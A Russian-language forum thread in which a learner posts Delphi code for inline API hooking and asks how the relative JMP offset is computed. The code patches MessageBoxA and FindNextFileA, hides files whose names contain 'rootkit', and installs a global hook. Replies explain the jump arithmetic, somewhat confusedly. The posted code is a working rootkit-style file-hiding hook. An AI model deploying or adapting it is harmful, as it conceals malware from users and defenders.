Выбор адреса для записи кода

[CODCHIK]

Привет всем. Не могу понять одну строку кода JMP_Rel := DWORD(HookFunct) - (DWORD(InterceptInfo.FunctionAddr) + 5);

Код:

uses
  Windows,
  SysUtils,
  Classes,
  TlHelp32;

type
 // Информация о перехваченной функции
 TInterceptInfo = record
  LibraryName  : string;  // Имя DLL
  FunctionName : string;  // Имя функции
  FunctionAddr : Pointer; // Адрес функции
  HookAddr     : Pointer; // Адрес перехватчика
  FunctCode    : packed array [0..4] of byte; // Первые байты кода функции
  HookJMP      : packed array [0..4] of byte; // JMP на перехватчик
 end;
var
 HookHandle   : hHook;      // Handle, возвращаемый SetWindowsHookEx
 MessageBoxInterceptInfo    : TInterceptInfo;
 FindNextFileAInterceptInfo : TInterceptInfo;
// Модификация машинного кода функции
function SetHookCode(InterceptInfo : TInterceptInfo; ASetHook : boolean) : boolean;
const
 CodeSize = 5; // Размер модифицируемого кода
var
 Tmp, OldProtect     : dword;
begin
 // 1. Настройка защиты
 VirtualProtect(InterceptInfo.FunctionAddr, CodeSize, PAGE_EXECUTE_READWRITE, OldProtect);
 // 2. Запись в первые байты машинного кода функции
 if ASetHook then
  Result := WriteProcessMemory(GetCurrentProcess, InterceptInfo.FunctionAddr,
                     @InterceptInfo.HookJMP[0], CodeSize, Tmp)
 else
  Result := WriteProcessMemory(GetCurrentProcess, InterceptInfo.FunctionAddr,
                     @InterceptInfo.FunctCode[0], CodeSize, Tmp);
 // 3. Восстановление атрибутов защиты
 VirtualProtect(InterceptInfo.FunctionAddr, CodeSize, OldProtect, Tmp);
end;

function InterceptFunctionEx(ALibName, AFunctName : string; var InterceptInfo : TInterceptInfo; HookFunct: Pointer) : boolean;
var
 Tmp     : dword;
 JMP_Rel : dword;
begin
 Result := false;
 // 1. Поиск адреса фукции
 InterceptInfo.FunctionAddr := GetProcAddress(GetModuleHandle(PChar(ALibName)), PChar(AFunctName));
 if InterceptInfo.FunctionAddr = nil then exit;
 // 2. Сохранение параметров в структуре
 InterceptInfo.LibraryName  := ALibName;
 InterceptInfo.FunctionName := AFunctName;
 InterceptInfo.HookAddr     := HookFunct;
 // 3. Считывание машинного кода функции
 Result := ReadProcessMemory(GetCurrentProcess,
                    InterceptInfo.FunctionAddr,
                    @InterceptInfo.FunctCode[0], 5, Tmp);
 if not(Result) then exit;
 // Подготовка буфера с командой JMP, формат E9 хх хх хх хх
 JMP_Rel := DWORD(HookFunct) - (DWORD(InterceptInfo.FunctionAddr) + 5);
 InterceptInfo.HookJMP[0] := $0E9;
 CopyMemory(@InterceptInfo.HookJMP[1], @JMP_Rel, 4);
 // Запись машинного кода JMP, передающего управление перехватчику
 Result := SetHookCode(InterceptInfo, true);
end;

// Перехватчик MessageBoxA
function myMessageBoxA(hWnd: HWND; lpText, lpCaption: PAnsiChar; uType: UINT): Integer; stdcall;
begin
 // 1. Восстанавливаем машинный код функции
 SetHookCode(MessageBoxInterceptInfo, false);
 // 2. Вызываем функцию
 Result := MessageBoxA(hWnd, lpText, PChar(String(lpCaption)+'(перехвачена !)'), uType);
 // 3. Восстанавливаем JMP на наш перехватчик
 SetHookCode(MessageBoxInterceptInfo, true);
end;

function myFindNextFileA(hFindFile: THandle; var lpFindFileData: TWIN32FindDataA): BOOL; stdcall;
begin
 try
  // 1. Восстанавливаем машинный код функции
  SetHookCode(FindNextFileAInterceptInfo, false);
  // 2. Вызываем функцию
  Result := FindNextFileA(hFindFile, lpFindFileData);
  while Result do begin
   if pos('rootkit', LowerCase(lpFindFileData.cFileName)) = 0 then exit;
   Result := FindNextFileA(hFindFile, lpFindFileData);
  end;
 finally
  // 3. Восстанавливаем JMP на наш перехватчик
  SetHookCode(FindNextFileAInterceptInfo, true);
 end;
end;

// Функция-обработчик перехватчика
function KeyHook(nCode: integer; WParam: Word; LParam: LongInt): Longint; stdcall;
begin
 // Вызов следующего в цепочке обработчика
 Result := CallNextHookEx(HookHandle, nCode, WParam, LParam);
end;

begin
// MessageBoxA(0, 'Message1', 'Rootkit', 0);
 // Перехват MessageBoxA
 InterceptFunctionEx('user32.dll','MessageBoxA',
                     MessageBoxInterceptInfo, @myMessageBoxA);
 InterceptFunctionEx('kernel32.dll','FindNextFileA',
                     FindNextFileAInterceptInfo, @myFindNextFileA);

// MessageBoxA(0, 'Message2', 'Rootkit', 0);
 HookHandle      := SetWindowsHookEx(WH_CBT, @KeyHook, HInstance, 0);
end.

[Stilet]

Цитата:

JMP_Rel := DWORD(HookFunct) - (DWORD(InterceptInfo.FunctionAddr) + 5);

Как я это понимаю: Вычисляется дистанция в байтах между началом функции-хука и функции-жертвы. 5 байт добавляется, потому что сама команда скачка (как в комментах сказано) занимает 5 байт. если мне не изменяет память JMP с относительным прыжком умеет скакать вперед, если операнд положительный, и назад, если операнд отрицательный. Соответственно тут получится команда "Перескочить через HookFunct-FunctionAddr байт назад или вперед."

[waleri]

rootkit? ну, ну...

[CODCHIK]

объясните пожалуйста на картинке процесс вычисления адреса и запись. мой цель изучать перехвать API
Безымянный.jpg

[Stilet]

Цитата:

ну, ну...

Ну хочется младшему поколению крутыми кулхацкерами себя почухать
Пусть побалуется, пока не осознает всю истину мироздания

Цитата:

объясните

А то что я написал непонятно?

[CODCHIK]

мой цель изучать перехват api не больше.
немного плохо понимаю как исполняется команды и адресация.

[Stilet]

Тебе нужны базовые знания ассемблера. Без них никуда. Без них не поймешь никакие обьяснения.
Ну попробуем по другому.
Допустим есть две функции:
foo() по адресу $123456
Hook() по адресу $789654
Твоя формула соответственно будет выглядеть так: $123456-$789654 если foo находится по коду выше или $789654-$123456, если ниже чем Hook()
Сколько между ними байт:$789654-$123456=6709758 байт.
Значит именно через столько байт перепрыгнет "JMP_REL", чтоб достичь функции хука из функции-жертвы.

Если foo находится по коду выше, то "JMP_REL" будет перепрыгивать на -6709758, т.е. назад, есл выше - то на 6709758 вперед.

[CODCHIK]

теперь я понял как это работает. спасибо за ответь вы мой наставник "Stilet"